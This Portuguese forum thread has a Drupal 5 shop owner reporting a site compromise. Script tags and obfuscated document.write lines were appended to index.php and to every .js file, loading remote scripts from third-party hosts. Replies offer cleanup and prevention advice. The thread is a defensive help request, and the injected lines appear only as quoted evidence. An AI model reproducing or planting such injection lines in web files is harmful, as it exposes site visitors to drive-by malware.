Trata-se de uma loja online baseada em Drupal 5.
De repente, não funcionou mais. Ao acessar o site apareceu esse erro:
Erro de análise: erro de sintaxe, '<' inesperado em /home/public_html/index.php na linha 38
Após uma inspeção mais aprofundada, encontrei as duas linhas a seguir no final do referido index.php:
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->
Depois de remover manualmente essas 2 linhas, o site parece funcionar bem novamente.
Mas depois que mais problemas (com edição de páginas) foram relatados, descobri que na verdade todos os arquivos *.js estão "infectados". Todos eles contêm uma linha extra no final:
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
Este site foi hackeado? Ao pesquisar "blog.nodisposable.com" no Google, nada de interessante aparece. Esse site em si parece legítimo. Provavelmente foi hackeado?
Alguém pode explicar como isso pode ter acontecido? O que posso fazer para reverter isso? E o que posso fazer para evitar isso no futuro?
Atualizar
Depois de restaurar um backup do site (não do banco de dados), aconteceu novamente, mas agora a tag do script apontava para dolfy.sedonahyperbarics.com:8080/XHTML.js.
Aparentemente, muitas contas de usuários aleatórias do Drupal também foram criadas. Portanto, isso pode ser um sinal de que na verdade era uma vulnerabilidade do Drupal.
Nós os removemos e restringimos a criação de contas de usuário apenas aos administradores (deveria ter sido assim desde o início, eu sei :-s). Também alteramos a senha do usuário administrador para algomais seguro.
Esperemos que não volte agora.
Responder1
Se foi hackeado, você não sabe se houve uma porta dos fundos instalada.
Talvez seja necessário reinstalar a partir de um backup em bom estado após uma reformatação.
Nunca confie em um sistema que tenha um intruso no sistema.
Para evitá-lo no futuro, você terá que se manter atualizado e se inscrever em listas que se mantêm atualizadas com vulnerabilidades e práticas recomendadas para o software que você está executando (listas drupal, listas de segurança da sua plataforma, etc.) , bem como bloquear serviços apenas para os usuários necessários para usar o sistema, usando senhas seguras, não fazendo nada em texto não criptografado e tudo o mais sob as melhores práticas de segurança que vão muito além do contexto da resposta aqui. E mantenha bons backups e instale detecção de intrusão (como um sistema semelhante ao Tripwire) para verificar a atividade de intrusos.
Responder2
Sim, você está infectado, infelizmente. O “como” é, infelizmente, impossível de dizer sem MUITO mais investimento de tempo e esforços. Pode ter sido uma vulnerabilidade na instalação do Drupal (ou em um de seus módulos), pode ter sido uma vulnerabilidade em outro aplicativo no mesmo servidor, pode ter sido uma senha de FTP fraca (ou roubada), etc. de possíveis pontos de entrada.
Responder3
Vi algo muito semelhante (quase idêntico), mas não relacionado ao Drupal e foi definitivamente um hack.
Como dizem os outros, é difícil saber sem mais informações sobre o seu ambiente. Uma coisa rápida que você pode fazer para impedir que ele seja veiculado é colocar uma diretiva em seu arquivo .htaccess que negará ou redirecionará qualquer solicitação para esse arquivo .js.
Responder4
Embora totalmente baseado apenas na minha própria experiência, cada hack como esse, especialmente com reinfecção, foi devido a alguém com acesso FTP ao servidor ter sua máquina local infectada e algo roubando credenciais - você deseja verificar os logs de FTP e ter certeza você reconhece todos os endereços IP e atualizações como válidos - se algo estiver reinfectando, você deverá vê-lo facilmente, se for o caso.